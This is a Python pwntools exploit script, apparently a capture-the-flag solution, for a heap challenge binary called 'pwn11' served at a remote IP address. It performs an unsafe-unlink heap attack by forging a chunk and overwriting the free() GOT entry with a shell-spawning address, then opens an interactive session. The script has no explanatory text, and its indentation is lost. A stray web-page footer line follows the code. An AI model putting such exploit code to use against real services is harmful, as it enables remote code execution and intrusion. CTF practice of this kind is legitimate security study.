from pwn import *
def conn():
global r,elf
#r = process("./pwn11")
r = remote("1.95.36.136", 2078)
elf = ELF("./pwn11")
def add(x):
r.sendlineafter(b"choice:\n",b"1")
r.sendlineafter(b"size:\n",str(x).encode())
def free(x):
r.sendlineafter(b"choice:\n",b"2")
r.sendlineafter(b"index:\n",str(x).encode())
def edit(x,y):
r.sendlineafter(b"choice:\n",b"3")
r.sendlineafter(b"index:\n",str(x))
r.sendlineafter(b"length:\n",str(len(y)).encode())
r.sendlineafter(b"content:\n",y)
def pwn():
add(0x30)
add(0x30)
add(0x30)
add(0x30)
add(0x80)
add(0x10)
target = 0x6010C0 + 0x18
fd = target - 0x18
bk = target -0x10
payload = p64(0)+p64(0x30)+p64(fd)+p64(bk)+b"a"*(0x10)+p64(0x30)+p64(0x90)
edit(3,payload)
free(4)
free_got = elf.got["free"]
payload = p64(free_got)
edit(3,payload)
sys = 0x4009D5
payload = p64(sys)
edit(0,payload)
free(0)
#gdb.attach(r)
r.interactive()
conn()
pwn()
浙公网安备 33010602011771号